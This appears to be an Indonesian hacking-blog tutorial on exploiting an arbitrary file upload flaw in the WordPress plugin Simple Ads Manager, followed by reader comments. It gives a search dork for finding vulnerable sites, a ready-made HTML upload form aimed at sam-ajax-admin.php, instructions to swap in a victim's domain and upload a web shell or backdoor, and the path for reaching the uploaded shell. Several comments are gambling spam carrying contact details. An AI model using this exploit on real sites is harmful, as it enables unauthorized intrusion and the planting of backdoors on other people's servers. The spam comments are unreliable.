Wot wot sudah lama ngga update - update tutorial dan kli ini gw bakal kasih tutorial terbaru agi yaitu dari bug Cms Wordpress dgn Plugins Simple Ads Manager... yahh memang di cms wordpress ini tiada henti bug bug selalu bermunculan :D tetapi tergantung kita pengolah / miminya dlm mempertahan kan web nya :D dan disini saya akan memberitahukan Bug / celahnya dan kita bisa Uplaod shell / backdoor looh B-) heheh.. kuy lah langsung !!
# Title : Wordpress plugin Simple Ads Manager - Arbitrary File UploaUpload
#Author : Tu5b0l3d
# Date : 05/04/2016
#Dork: inurl:/wp-content/plugins/simple-ads-manager/
# CSRF: simpan dengan file.html
CSRF nya :
<form enctype="multipart/form-data"
action="http://target.com/[PATH]/[PATH]/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php" method="post">
<input type="text" name="path"><input name="uploadfile" type="file" />
<input name="action" type="hidden" value="upload_ad_image">
<input type="submit" value="upload">
</form>
Tinggal ganti http://target.com dengan domain target kalian dan save script csrf nya dengan extensi Html dan jalankan dengan web browser kalian trs tinggal uplaod deh shell kalian and.... uhuy kuy kuy lah sikatt :D wkwkw
#Shell akses : http://site.com/wp-content/plugins//simple-ads-manager/shell.php
ok, cukup sekian bro tutorialnya semoga bermanfaat :D jgn lupa nitip nick ane ya B-)
- Mr.sx00f || 0x0x1337
intext:"It is in point of fact a nice and helpful piece of information."
BalasHapusgood article and I really like this article thanks.
bandar togel
Komentar ini telah dihapus oleh pengarang.
BalasHapusizin share ya admin :)
BalasHapusburuan gabung bersama kami,aman dan terpercaya
ayuk... daftar, main dan menangkan
Line : agen365
WA : +855 87781483 :)
Silakan di add ya contaknya dan Bergabung juga ya :)